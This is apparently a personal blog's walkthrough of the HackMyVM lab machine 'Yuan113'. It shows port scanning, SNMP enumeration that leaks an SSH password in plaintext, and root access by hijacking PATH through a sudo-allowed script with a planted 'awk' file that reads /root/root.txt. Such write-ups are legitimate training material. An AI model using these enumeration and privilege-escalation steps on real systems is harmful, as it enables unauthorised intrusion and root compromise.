HMV-Yuan113靶机复盘

2026-3-20 126 3/20

要一些思路

 

nmap -p- --min-rate 10000 192.168.186.211
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-03-19 22:44 EDT
Nmap scan report for 192.168.186.211
Host is up (0.0065s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
143/tcp open imap

 

经过尝试80端口扫不出来东西,也无交互,页面只有一句话

25,110,143连不上

扫UDP端口

 

└─$ sudo nmap -sU -p1-200 192.168.186.211
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-03-19 22:57 EDT
Nmap scan report for 192.168.186.211
Host is up (0.0022s latency).
Not shown: 199 open|filtered udp ports (no-response)
PORT STATE SERVICE
161/udp open snmp

 

连接161端口

snmpwalk -v 2c -c public 192.168.186.211

会输出很多东西,慢慢找,发现了

"service --user welcome --password mMOq2WWONQiiY8TinSRF --host localhost --port 8080"

直接ssh连接即可

 

sudo -l

发现了可以sudo执行 /opt/113.sh

welcome@113:/opt$ cat 113.sh 
#!/bin/bash

sandbox=$(mktemp -d)
cd $sandbox

if [ "$#" -ne 3 ];then
        exit
fi

if [ "$3" != "mazesec" ]
then
        echo "\$3 must be mazesec"
        exit 
else
        /bin/cp /usr/bin/mazesec $sandbox
        exec_="$sandbox/mazesec"
fi

if [ "$1" = "exec_" ];then
        exit
fi

declare -- "$1"="$2"
$exec_

必须输入三个变量,最后一个必须是mazesec

注意declare -- "$1"="$2"

我们可以控制前两个变量,设置路径

welcome@113:/opt$ cat /usr/bin/mazesec
#!/bin/bash

flag=$(echo $RANDOM$RANDOM$RAMDOM$RANDOM | md5sum | awk '{print $1}')
echo "flag{fakeroot-$flag}"

 

 

发现使用了md5sum,awk,echo命令

在/tmp下创建一个名为awk的文件,输入/bin/cat /root/root.txt

sudo /opt/113.sh PATH /tmp mazesec

就会执行我们创建的恶意awk文件,获得flag,也可以换成其他方式执行命令获得shell

- THE END -

sanoplluser

3月20日15:48

最后修改:2026年3月20日
0

非特殊说明,本博所有文章均为博主原创。

共有 0 条评论